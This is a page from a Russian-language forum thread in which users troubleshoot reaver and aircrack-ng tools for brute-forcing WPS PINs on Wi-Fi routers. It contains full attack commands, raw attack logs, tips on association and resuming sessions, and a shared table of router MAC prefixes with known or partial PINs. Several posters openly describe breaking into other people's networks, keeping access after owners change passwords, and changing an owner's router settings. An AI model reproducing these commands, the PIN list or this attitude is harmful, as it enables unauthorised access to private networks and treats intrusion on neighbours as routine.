Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup
Страницы :
1
[
2]
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
бывает и такое, только я после горького опыта стал записывать последний пин на бумаге, в случае не возможности продолжения сессии вбивал продолжение по маске.
как имено если он блокируется полностью на сутку ?
Также может кто поможет.
У меня второй адаптер TP-link TL-WN7200ND, BT5 R1, драйвер показывает rt2800usb. Мониторить он мониторит WPS. Но как только включаю подбор пинов к какой нибудь сети так процесс буксует на 1 пине, и куча ошибок. Пробовал разные сети, по разному прописывал.
Вот лог с ВТ:
[+] Switching mon0 to channel 4
[+] Associated with F4:EC:38:AF:A2:96 (ESSID: Microsoft)
[+] Trying pin 12345670
[+] Switching mon0 to channel 4
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Что делать ? дело в драйвере ? если да, так какой ставить и как именно ?
А то на родном адаптере ноута сломал 1 точку за 5 чесов, а на етом просто 0. Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.
Ghosttt
открой еще одну вкладку терминала и
aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one
...Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.
У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.
У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.
суть в том что я пробовал разные точки, результат 1.
Даже пробую точку к которой 2 дня назад добыл пин к ВПС адаптером встроенным в ноут, результата 0
Traing pin 12345670.
далее куча ошибок и опять Traing pin 12345670. потом пишет прогрес 0.00% и по второму кругу...
не понимаю в чем проблема...адаптер Tp-link TL-WN7200ND вроде должен работать так как чип там rl3070 а на деле толку с WPS 0.
Может у ково такой адаптер посоветуйте.
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.
А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?
user_bad
09.08.2012, 11:42
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.
А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?
У меня тоже такой чип под ви фи слакс 64-2 работает, но есть точки которые просто не подбираются не смотря на всякие уловки, есть netgear которая останавливается на 99989989 пишет что 99.9% и все, может здесь пины куда выкладывать к разным макам, чтобы проверять руками а?
как имено если он блокируется полностью на сутку ?
пока никак наверно, если только терпением, я имел ввиду что после трех недельного брута примерно 80%, на следующий день отказался продолжать сессию (логи тоже были пусты), вот где не приятный сюрприз был, после этого случая если надо было подобрать пин к точке с такими симптомами, последний записывал на бумаге на всяк случай (как оказалось не зря, по крайней мере в моем случае). точка в конце концов сдалась конечно имхо конечно, но скоро халявный WPS прикрутят, с каждым разом все больше точек появляется без оного, спасибо системным администраторам обитающим по этим форумам. пардон за флуд, можете удалить
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.
А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?
Ок опишу все как было.
ОС ноутбуку 7, драйвер ТП-линковский с диска, пробовал от Альфы но мне показалось что стало ловить менше точек, переставил назад родной.
Запускаю reaver через usb с загрузочной флешки.
1) airslax_1.2 там reaver 1.4 вшит, в папку модулс перепробывал много драйверов, мониторинг пошел после передьоргивания кабеля адаптера на драйвере rt2x00. Но после начала подбора пина выдайот что сбой присоеденения к точке. Родной адаптер ноутбука Broadcom прекрасно работает там же на драйвере b43, легко подобрал пин и сломал пароль к 1 точке за 5 с лишним часов.
После, решыл что airslax плохо ладит с адаптером, решыл по старинке использовать провереный ВТ5.
2) BT5R1-GNOME-32, драйвер там автоматом показывает rt2800usb, установил reaver-1.4 все как положено.
wash -i mon0 -C -s показывает несколько сетей.
после беру например ту же сеть что уже сломал ранше, на ней перебор был 4 пина\сек, тоесть сигнал хорошый, а поскольку ТП линк сильнее так вопше должно было летать.
Прописываю:
reaver -i mon0 -b XX:XX:XX:XX:XX -vv
или
reaver -i mon0 -b XX:XX:XX:XX:XX -vv --dh-small
и все, начинает буксувать на 1 пине = ступор.
Пробывал как выше советовали в 2 окне прописывать:
aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one
выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор. Если ето важно скопирую кину сюда лог.
И в итоге толку 0.
У меня тоже такой чип под ви фи слакс 64-2 работает
какой драйвер ты используеш ? Тоесть бросаеш в папку модулс ?
...
выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор....
Если aireplay ругается на канал, нужно сначала запустить airodump с требуемым каналом, прим.
airodump-ng mon0 -c 4
Потом в другой вкладке запустить aireplay. После успешной ассоциации airodump следует отключить (он мешает корректной работе ривера). И далее запускаем ривер с включенным aireplay.
Незнаю с чем связано, но у меня половина точек работают только с aireplay (причем при использовании aireplay существует вероятность пропустить правильный ПИН (у меня из 6 точек в 2х пропустил- пришлось заново))
kykyry3ka
09.08.2012, 20:56
Ghosttt
Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones
http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.
Ghosttt
Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones
http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.
попробывал и 1 и 2.
работает как и у тебя только через кляксу.
но поскольку там не сохроняет сесию, тоесть после перезагрузки комп*ютера перебор начинается с 12345670.
Как начать перебор сразу с конкретного пина, например 50005673
но так что б дальше шло 50015671 а не 50005674 ???
ето реально в wifislax 4.1 или xiaopan-0.3.8 ?
kykyry3ka
10.08.2012, 22:27
Ghosttt
В wifislax 4.1 есть програмка :recording sesion reaver - находится :wifislax/wpa wps/ .Oна сохраняет сесию на рабочий стол ,просто копируешь этот файл к себе на жесткий или на ту-же флешку, а потом после перзагруки запускаешь его ,сессия начнется с момента остановки.В xiaopan-0.3.8 сессия сохраняется по адресу: usr/local/etc/reaver/ там будут файлы с расширением - wpc ,сначала идет мак адрес точки и расширение wpc ,также копируешь этот файл , а потом после перзагрузки перед запуском проги закидываешь его обратно в эту же папку и сесия возобновляется.
Если ты знаешь первые чеыре цифры пина то вводишь в табло : -p XXXX ,где иксы твои цифры.
user_bad
10.08.2012, 23:19
Ghosttt в вифи слаксе и 64 бита и в 32 распознается как 3070 я как бы пользую просто с лайв флешки драйвер вроде пишет RT2070 или типа этого если важно гляну, а внутренний адаптер атерос тоже видит ноут делл 1501
Stranger@
13.08.2012, 17:45
Может кому надо:
Графический интерфейс "Inflator" для удобного использования reaver-wps версии 1.4.
Отлично работает в Backtrack5.
Чтобы установить Inflator, распакуйте архив и в консоле введите: sudo dpkg -i inflator1.0-backtrack5r1-gnome-bit32.deb
GUI качать отсюда:
http://www.ibeini.com/inflator/inflator1.0-backtrack5r1-gnome-bit32.zip
Не обновите ссылки пожалуйста.
Не обновите ссылки пожалуйста.
Зазерклил Inflator for reaver-wps тут: http://rusfolder.com/images/download_1.jpg
Как включить WPS в точке доступа через админку? Все меню перелазил не нашел эти буквы WPS. Вообще это беспроводная точка доступа с adsl модемом.
Andrei_,
модель раутера? не каждый раутер поддерживает wps
Andrei_,
модель раутера? не каждый раутер поддерживает wps
Belkin F1PI243EGau
Заглавная страница админки выдает 2010 год.
Belkin F1PI243EGau
Заглавная страница админки выдает 2010 год.
Здесь посмотри
бегло пробежался по мануалу, походу нет там такой функции
бегло пробежался по мануалу, походу нет там такой функции
Жаль. Придется пока как-то wds на нем настраивать, на случай потери доступа. Интернет через него так сладок. Неразумные владельцы уже меняли на нем пароль, в этот раз еле взломал.
Жаль. Придется пока как-то wds на нем настраивать, на случай потери доступа.
wds - это не панацея в данном случае, при смене паса так и так работать не будет
Всем привет стокнулся с такой проблемой при запуске reaver сразу после стандарт 12345678 начинает давать М5 М6 и перебирает вторую часть PIN оставляя 1234 как правильную доходит до 99.99% и не находит.
Пробовал перезапускать без сохранения тоже.Пробовал с диска inflator не помогает такаеже история .
По моему первие 1234 неверная часть pin . Как можно исправить?
Какая из сборок адекватно поддерживает tp link 7220 nd ( без установки драйвера)?Спасибо.
Gloria64
27.08.2012, 15:57
AP Association
Сразу приношу изинения, я тут новичок.
Ситуация следующая. С TL WN7200ND и Backtrack 5R2 (reaver 1.4) почти без дополнительных манипулций успешно сдался МТС-овский рутер. Вдохновившсь упехом, выключаю этот и включаю друогй, стоящий рядом же. В результате Failed to associate. Здесь сигнал гарантировано хороший. Пробую то, что видно рядом - либо Failed to associate, либо переключение каналов. Правда, сигнал там уже существенно хуже - 75-80. С одним законектился при сигнале 83 и даже начал что-то делать. Так вот, суть вопроса: дело в сигнале или всё же в типе рутера "жертвы" и мне просто дико н повезло, что из всех 7-8 подходит для экспериментов только один?
И второй вопрос: что по идее должен писать Wash, если на точке нет WPS? У меня он как-то глухо висит и молчит.
Просветите, пожалуйста, когда будет время.
Ну, насколько я осведомлен в этом вопросе, то WPS должен быть прежде всего активирован на роутере/модеме, во-вторых, проверь состояние интерфейса wlan0(1) ifconfig. Если wlan0 лежит, то ассоциация и не произойдет, т.е. mon0 - это виртуальный интерфейс, через который производится взлом, а wlan0 - это сама карта непосредственно, и она ассоциируется с ТД и должна быть поднята. ifconfig wlan0 up. Я сам несколько раз проверял, пока wlan лежит - reaver не ассоциируется.
... включаю друогй, стоящий рядом же. В результате Failed to associate.
Попробуйте дополнительно указать ESSID сети: "-e ESSID". Иногда очень помогает. Естественно WPS на точке должен быть включён.
И второй вопрос: что по идее должен писать Wash, если на точке нет WPS? У меня он как-то глухо висит и молчит.
Просветите, пожалуйста, когда будет время.
Если включён WPS, то wash покажет в таблице эту точку. Если нет, то - нет.
_Malina_
27.08.2012, 22:44
Вопрос возник по поводу команды wash и у меня, раньше когда запускал бт5р2 с лив юсб и встроенный в ноут адаптер проблем не было. Сейчас поставил бт5р3 на виртуалку + адаптер сменил на тл7200нд, так вот все хорошо но wash мне выдает ошибку что-то там и большие буквы NPC или NCP точно не помню(сейчас адаптер не с собой) и команда выполняеться непрерывно тоесть строки бегут вниз с той же ошибкой до безконечности. И еще одно с долбаной виртуалкой никак не могу провести деаутефикацию клиента от точки хотя раньше с первым набором(который выше описан) все проходило, параметры задавал разные толку ноль.
_Malina_
27.08.2012, 23:34
допишите в wash -C -s
параметры задавал разные толку ноль.
допишите в wash -C -s
Поправлю, полная команда выглядит так: wash -i mono -C - в этом случае вош не будет показывать ошибки, а только чистую таблицу точек с включенным WPS.
Ситуация следующая. С TL WN7200ND и Backtrack 5R2 (reaver 1.4) ...
У меня такой же адаптер и BT 5 r1 (reaver 1.4) не работает ни с одной ТД,а старый китайский ноунейм RTL8187l отлично работает со всеми точками.
_Malina_
28.08.2012, 15:13
Поправлю, полная команда выглядит так: wash -i mono -C - в этом случае вош не будет показывать ошибки, а только чистую таблицу точек с включенным WPS.
о_О спасибо помогло только проблема в том что сработало только после того как выдернул и заново вставил в ноут адаптер что-то не так с этой виртуалкой моей.
Gloria64
28.08.2012, 17:41
У меня такой же адаптер и BT 5 r1 (reaver 1.4) не работает ни с одной ТД,а старый китайский ноунейм RTL8187l отлично работает со всеми точками.
Тут у меня был один нюанс (BT5 r2). Во-первых по умолчанию на него почему-то ставится TXPower 0, я меняю на auto. И второй момент airodump-ng сама по себе работает, но адаптер после неё почему-то впадает в транс. У меня решается командами ipcofig wlan0 down, ipconfig wlan0 up. Причём то же самое с дистрибутивом Xiaopan, такчто видимо особенность драйсера.
Всем привет стокнулся с такой проблемой при запуске reaver сразу после стандарт 12345678 начинает давать М5 М6 и перебирает вторую часть PIN оставляя 1234 как правильную доходит до 99.99% и не находит ничего .Кто нибудь может чтото посоветовать ? Заранее спасибо.
Есть вопрос: знает ли кто, а если клиенты коннектятся к ТД именно используя технологию WPS, т.е. путем ввода ПИН-кода, есть ли шанс перехватить в эфире этот самый ПИН?
Есть вопрос: знает ли кто, а если клиенты коннектятся к ТД именно используя технологию WPS, т.е. путем ввода ПИН-кода, есть ли шанс перехватить в эфире этот самый ПИН?
Исходя из механики самого процесса - шанс есть) только здесь есть множество узких моментов:
1. Информация зашифрована уникальным шифром, а шифр работает, исходя из ключей Диффи-Хелльмана, которыми обмениваются устройства при передаче пин-кода. Для каждой пары устройств ключи разные, так что, чтобы расшифровать пин, необходимо сначала подобрать эти ключики.
2. Но проблема даже не в самих ключах больше заключается. Обмен пинами - процедура одноразовая. То бишь если для перехвата ключа от точки клиента от неё можно отключать хоть до посинения и ловить хендшейки, то с пином такая тема не прокатит - единожды предоставив свои настройки клиентскому устройству, точке (да и клиенту) нет нужды снова повторять эту процедуру.
Если же очень интересно, как всё это выглядит изнутри, можно взять старый добрый Wireshark, нахватать пакетов, заранее зная, что где-то среди них прячутся пакеты авторизации по WPS, и препарировать, используя это
Вот два основных... Если же интересовал сам факт возможности перехвата - прошу меня извинить за лишние размышления =)
а вот это уже интересненько....
Бум изучать.
Интересное у вас тут общение в этом топике. Пару вопросов с вашего разрешения:
1. Удалось подобрать пин к трем точкам. На первую ушло порядка 3- часов на остальные где-то по 10. В 2 -х случаях из 3 пароль reaver'ом не выдавался только пин. Пробовал и "-p " не помогло. Отсюда вопрос, ребят, вообще, в принципе, реально настроить у роутер так, чтобы пароль не вводить, а входить только по пину, если да, то какие подскажите утилиты для ubuntu, чтобы к таким роутерам подключится?
Или может быть есть еще какие-нибудь способы узнать пин по паролю?
Вроде всю тему 2 раза перечитал, но кроме ввода с ключом "-p " вариантов не увидел.
2. И еще, как уже здесь все, наверное, в курсе к некотором роутерам надо ассоциироваться через aireplay-ng. Вот, что у меня получилось при попытке ассоциироваться с некоторыми из них:
aireplay-ng -1 120 -a mon0
No source MAC (-h) specified. Using the device MAC (mac моей карты)
13:33:52 Waiting for beacon frame (BSSID роутера) on channel 5
13:33:52 Sending Authentication Request (Open System)
13:33:52 Authentication successful
13:33:52 Sending Association Request
13:33:57 Sending Authentication Request (Open System) [ACK]
13:33:57 Authentication successful
13:33:57 Sending Association Request [ACK]
13:34:00 Denied (code 12), wrong ESSID or WPA ?
13:34:03 Sending Authentication Request (Open System) [ACK]
13:34:03 Authentication successful
13:34:03 Sending Association Request [ACK]
13:34:03 Denied (code 12), wrong ESSID or WPA ?
13:34:06 Sending Authentication Request (Open System) [ACK]
13:34:06 Authentication successful
13:34:06 Sending Association Request [ACK]
13:34:06 Denied (code 12), wrong ESSID or WPA ?
13:34:09 Sending Authentication Request (Open System) [ACK]
13:34:09 Authentication successful
13:34:09 Sending Association Request [ACK]
13:34:09 Denied (code 12), wrong ESSID or WPA ?
13:34:12 Sending Authentication Request (Open System) [ACK]
13:34:12 Authentication successful
13:34:12 Sending Association Request [ACK]
13:34:12 Denied (code 12), wrong ESSID or WPA ?
13:34:15 Sending Authentication Request (Open System) [ACK]
13:34:15 Authentication successful
13:34:15 Sending Association Request [ACK]
13:34:15 Denied (code 12), wrong ESSID or WPA ?
13:34:18 Sending Authentication Request (Open System) [ACK]
13:34:18 Authentication successful
13:34:18 Sending Association Request [ACK]
13:34:18 Denied (code 12), wrong ESSID or WPA ?
Из-за чего такое может быть? какие у кого варианты?
Обрати внимание: "wrong ESSID or WPA" - укажи ему ESSID - имя сети
То есть в aireplay-ng указать вместе с bssid и essid? Или только essid?
Вопрос к спецам , можно ли с помощью хитрой команды , используя BackTrack 5r3 включить WPS , там где он выключен.
_Malina_
31.08.2012, 23:45
Вопрос к спецам , можно ли с помощью хитрой команды , используя BackTrack 5r3 включить WPS , там где он выключен.
ну разве если Ты протянеш пальца через сетку и нажмешь физически на кнопочку
_Malina_
31.08.2012, 23:47
То есть в aireplay-ng указать вместе с bssid и essid? Или только essid?
Руки есть попробуй и так и так бояться не нужно пк ты этим не поломаешь!
вопрос, ребят, вообще, в принципе, реально настроить у роутер так, чтобы пароль не вводить, а входить только по пину, если да, то какие подскажите утилиты для ubuntu, чтобы к таким роутерам подключится?
присоединяюсь к вопросу, куда вводить ПИН работая по убунтой?
присоединяюсь к вопросу, куда вводить ПИН работая по убунтой?
Если я правильно понял вопрос, то примерно так:
1. wpa_supplicant -Dwext -iwlan0 -C/var/run/wpa_supplicant -B
2. wpa_cli wps_reg
или поставить wpa_gui — там ещё проще.
2 jabberd
спасибо. попробую.
и еще такой вопрос ребята. гуглил побобие базы "mac - wps pin"
ничего не нашел. подскажите такая вообще в приоде есть или только самим собирать?
и еще такой вопрос ребята. гуглил побобие базы "mac - wps pin"
ничего не нашел. подскажите такая вообще в приоде есть или только самим собирать?
Читаем пост #174 и #214. Ищи гуи и оттуда бери базу пинов =) вроде бы база периодически обновляется =)
Можно ... в текущей версии 1.1.6 где-то так -
здесь приведена небольшая база PIN-кодов, пост #174 - в этой ветке
База постоянно обновляется
А, как это сделать, т.е. базу вытянуть? Если не трудно и с подробностями. СПС.
А, как это сделать, т.е. базу вытянуть? Если не трудно и с подробностями. СПС.
Было уже про базу пинов . Смотри тут.
Нет, человек интересуется, как из этого гуя вытащить ту самую базу, из которой он, гуи, производит сверку МАС-ов, кто-то привел таблицу извлеченных МАС-ов, так вот интересно, как он ее извлек?
роутер dir-620
ривером подобрал пин, пароль ривер не показывает ни при каком раскладе на эту ТД.
из под убунты ничего не получлось, хуже того, из под вин 7
во вкладке Сеть вижу ТД RalinkAPS (судя по МАК адресу это именно тот дир-620), нажимаю настроить, ввожу ПИН, он мне выдает пароль (
всегда разный) кликаю далее -> невозможно настроить роутер (как то так). сигнал отличный.
как приконектиться к этой точке ума не приложу, пин есть и правильный, а толку .
поясните пожалуйста подробно на русском языке что в таком случае делать.
Нет, человек интересуется, как из этого гуя вытащить ту самую базу, из которой он, гуи, производит сверку МАС-ов, кто-то привел таблицу извлеченных МАС-ов, так вот интересно, как он ее извлек?
в WPSCrack-GUI база пинов находиться в файле WPSCrackGUI.gambas, можно любым текстовым редактором открыть и выдрать . Лежит он тут:
PHP:
/usr/bin/
Особого смысла в этом правда не вижу, ведь удобнее через ГУЙ их искать.
Особого смысла в этом правда не вижу, ведь удобнее через ГУЙ их искать.
Прогнал по всем доступным версиям. Выдрал базы. Составил свою базу+еще кое что надыбал. Доволен. Главное-понял что-к-чему. Большое спасибо!
Прогнал по всем доступным версиям. Выдрал базы. Составил свою базу+еще кое что надыбал. Доволен. Главное-понял что-к-чему. Большое спасибо!
А поделиться?
А никто не сталкивался с подробным описанием процесса атаки? Согласно этому документу для взлома станции требуется отправка 4 сообщений и получение соответствующего количества ответов. Заглянуть в эти сообщения можно с помощью wireshark или же в reave'ре есть функция подробного описания?
У кого есть информация, прошу ответить.
Заранее спасибо.
А никто не сталкивался с подробным описанием процесса атаки? Согласно этому документу для взлома станции требуется отправка 4 сообщений и получение соответствующего количества ответов. Заглянуть в эти сообщения можно с помощью wireshark или же в reave'ре есть функция подробного описания?
У кого есть информация, прошу ответить.
Заранее спасибо.
Reaver на этой уязвимости и работает. Первую страничку этой темы прочитай.
Я запустил wifislax, потом wps crackGUI активировал адаптер алфа и стал сканировать ат. процесс пошел нормально . потом Я хотел посмотреть базу с пинами ,но она не открывается вернее нужен инет.Однако, когда я подключаюсь к инету через wifislax не работает wps crack GUI с инетом и наоборот .
Как-же подключит wps crack GUI к инету для обновления базы .
Заранее очень благодарен,
Как-же подключит wps crack GUI к инету для обновления базы .
Заранее очень благодарен,
База уже зашита в гуи, обновить можно только саму утилиту (в ней база). А ссылку тебе давали страницей раньше, там и последняя версия с обновленной базой. Но, можно, купив бубен, ручками переписать файлик WPSCrackGUI.gambas добавив туда свое, но это уже для гурманов. Ведь страницей раньше user100 уже все разжевал, большое ему спасибо!
роутер dir-620
ривером подобрал пин, пароль ривер не показывает ни при каком раскладе на эту ТД.
из под убунты ничего не получлось, хуже того, из под вин 7
во вкладке Сеть вижу ТД RalinkAPS (судя по МАК адресу это именно тот дир-620), нажимаю настроить, ввожу ПИН, он мне выдает пароль (
всегда разный) кликаю далее -> невозможно настроить роутер (как то так). сигнал отличный.
как приконектиться к этой точке ума не приложу, пин есть и правильный, а толку .
поясните пожалуйста подробно на русском языке что в таком случае делать.
вобщем разобрался что делать с пином, с помощью родной ралинковской утилиты создал ВПС профиль и подключился к сети, единственный момент, когда настраивал, забыл указать старый SSID, а на веб морде оказался не дефолтовый пароль.
владелец все потом исправил, надеюсь он подумал что это глюк. вопрос. еслии при настройке/подключении задал какой нибудь SSID возможно ли его как то потом изменить, кроме как через веб морду? пробовал опять через пин, удалял профили и дт. не получалось.
Reaver на этой уязвимости и работает. Первую страничку этой темы прочитай.
Этого недостаточно, мне нужно полное описание процесса взлома, что посылается, что приходит
Этого недостаточно, мне нужно полное описание процесса взлома, что посылается, что приходит
Вот тут процесс расписан подробно и по русски:тыц.
Или тот же PDF штудируйте, ссылкуна который Вы дали.
Статей по обсуждаемой уязвимости море, во многих из них сказано, что даже при отбитой опции WPS некоторые роутеры подвержены взлому, т.е. - отключенный WPS не совсем отключен. Так вот возник вопрос: что нужно для взлома таких вот, недоотключенных?
что нужно для взлома таких вот, недоотключенных?
а они разве как то подругому буду ломаться? я так понимаю опция ВПС отключается для пользоветеля в веб интрефейсе, а пофакту может остаться, но мне такие роутеры не попадались по факту. на своем тп линк 842 проверял если впс отключаеть, то уже все, никак.
Немного подправил и добавил базу. Некоторые пины разорвались, если надо поправьте ручками, сам не могу.
00:0B:3B 3814XXXX
00:0C:F1 30447028
00:11:6B 3042XXXX
00:14:D1 26848185,1234XXXX
00:18:02 16546615
00:18:E7 15537782
00:19:15 12345670
00:19:70 12345670,64637129,22310298
00:1A:2B 15624697,8847XXXX
00:1D:19 12345670,66026402
00:1D:73 88420707
00:1D:7E 66026402
00:1D:CE 85560130
00:21:29 64637129,22310298
00:21:91 82744458
00:22:F7 2456XXXX
00:24:01 97744757
00:24:17 31011193
00:26:24 95374611
00:26:44 7820XXXX,78202962
00:26:5A 76971464
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX,10770 511,32754544,28161141,09735651,2091XXXX,11508335,1 1516675,11450764,11515562,11432401,11455776,115167 05,11509059,11483465,11480044
00:26:E8 15483607
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:4F:62 21207136
04:C0:6F 0751XXXX
08:86:3B 21250491,3737XXXX
1A:0B:40 17068161
1C:7E:E5 6041XXXX,22609298,60418579
1C:AF:F7 0630XXXX
20:2B:C1 1957XXXX
20:4E:7F 45197079
2C:B0:5D 5482XXXX
30:39:F2 1670XXXX,16538061,4329XXXX,1340XXXX
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482 417,95221021
34:08:04 36022656,93395274
38:60:77 12345670,78985933,7898XXXX
38:72:C0 12345678
40:4A:03 11866428
50:67:F0 20064525
54:E6:FC 5325XXXX,53256XXX,9999XXXX
58:6D:8F 47158382,69382161
58:6D:8F 69382161
58:98:35 53890894
5C:33:8E 82848439,11765592,43154XXX,9901XXXX
5C:35:3B 64874487,6487XXXX,9575XXXX
62:C0:6F 3663XXXX,3442XXXX
64:68:0C 7996XXXX
68:C0:6F 41719565
6A:A8:E4 3416XXXX
6A:C0:6F 3722XXXX
6A:C7:14 3205XXXX
72:A8:E4 3357XXXX
72:C0:6F 3863XXXX
74:44:01 3555XXXX,00446747,2761XXXX,27615126
78:A2:E4 5390XXXX
7C:4F:B5 75332662,72688656,00948135
84:A8:E4 7996XX00
84:C9:B2 54772373
88:25:2C 7654XXXX,03526859,7442XXXX,74425648,3565XXXX,0452X XXX
94:0C:6D 3795XXXX
94:44:52 93645348,2444XXXX,5319XXXX,26023809
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX,0669XXXX,0996X XXX
B0:48:7A 0055XXXX,54335677,1111XXXX
BC:76:70 6326XXXX,6343XXXX,63431919
C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
C0:AC:54 8345XXXX,2585XXXX,2503XXXX
C0:C1:C0 78985933,7898XXXX,04840954
C4:3D:C7 5141XXXX,51419981,6810XXXX
C8:3A:35 01756401
CC:5D:4E 53084682
CC:96:77 12345670,78985933,7898XXXX
CC:96:A0 5051XXXX
CO:3F:0E 8321XXXX,25032918
DC:0B:1A 1653XXXX,1835XXXX
E0:69:95 2456XXXX
E0:CB:4E 62987523
F4:3E:61 47158382,69382161
F4:C7:14 12345670,5141XXXX,51419981,6810XXXX
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F8:D1:11 4867XXXX
FC:75:16 46264848
Дополняйте, кто, чем может-поможет. Реально - знание пина (хотя бы 4-х первых цифр - 90,96% сделанной работы).
Цитата с соседнего форума:
на некоторых роутерах при отключении WPS он всеравно продолжает работать..... хоть в интерфейсе роутера показывает что WPS отключено. такая вот ситуевина спасибо производителям роутеров
У меня тоже есть такая точка. Подбор пинов происходит только тогда, когда отображается (неважно в какой утилите) wps. Сложность в том, что wps не всегда отображается. Не думаю, что хозяин точки балуется этим. И как это победить?
ЗЫ: сигнал оч.хороший.
Используя wifi slax 4.2 ,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов ,однако при вводе этих маков с заранее известных пинов в программе WPS crackGUI ,она не выдает ожидаемого пина.КАК правильно дописать и дополнить базу в самой утилите?
palec1923
30.09.2012, 20:42
Цитата с соседнего форума:
У меня тоже есть такая точка. Подбор пинов происходит только тогда, когда отображается (неважно в какой утилите) wps. Сложность в том, что wps не всегда отображается. Не думаю, что хозяин точки балуется этим. И как это победить?
ЗЫ: сигнал оч.хороший.
Хозяин не балуется, это у них сигнал балуется, советую что касается USB адаптеров смотреть сигнал в NetStumbler , не надо забывать о таком немаловажном показателе как качество, airodump RXQ показывает не коректно, лучше смотреть под виндой NetStumbler это очень наглаядно видно в этой проге, сигнал может быть и -50, но если он ввиде частокола толку от этого сигнала -0 хендшейк может и с 20-30ой попытки и получите, не факт , что он будет правильным, ривер точно работать не будет, ну и наконец, если даже и подключитесь к этой точке, инета вы не получете по причине плохого пинга.
Используя wifi slax 4.2 ,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов ,однако при вводе этих маков с заранее известных пинов в программе WPS crackGUI ,она не выдает ожидаемого пина.КАК правильно дописать и дополнить базу в самой утилите?
Отправьте разрабам свои пины , они в базу их и добавят. Функция отправки реализована в самом GUI.
Используя wifi slax 4.2,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов
Переписать файл WPSCrackGUI.gambas не так просто. Потребуется знание языков программирования. Проще вытянуть оттуда базу и тупо сохранить в каком-нибудь блокноте. В дальнейшем использовать эту базу при написании команд reaver-у в консоли. Я, например, использую базу в кляксе - проще и удобнее (правда работаю в wifislax 4.1, в 4.2 тормоза бесят). А, что касается, отправить разработчикам свои маки-пины, так вот пример: отправил сюда им свои шесть мак-пинов. и через неделю наблюдаю их в бета-версии 1.1.9., правда только три из них. Довольно оперативно, молодцы.
http://s019.radikal.ru/i613/1209/25/266d8efb87c8.jpg
ЗЫ:версию можно поменять, меняя в директории "/usr/bin" сам файл WPSCrackGUI. Вот, к примеру, версия 1.1.9 beta
Первый раз reaver попробовал в работе и почти обрадовался, однако он выдал мне только WPS ключик, а вот WPA пароль нет . Точка TP-LINK т.к. SSID не поменяли. Где то вроде инфа была что туполинки заплатку какую то сделали или я ошибаюсь?
Первый раз reaver попробовал в работе и почти обрадовался, однако он выдал мне только WPS ключик, а вот WPA пароль нет .
У меня часто так бывает, что выдаёт только WPS PIN. Тогда я пробую коннектиться именно по нему (wpa_cli wps_reg BSSID PIN)
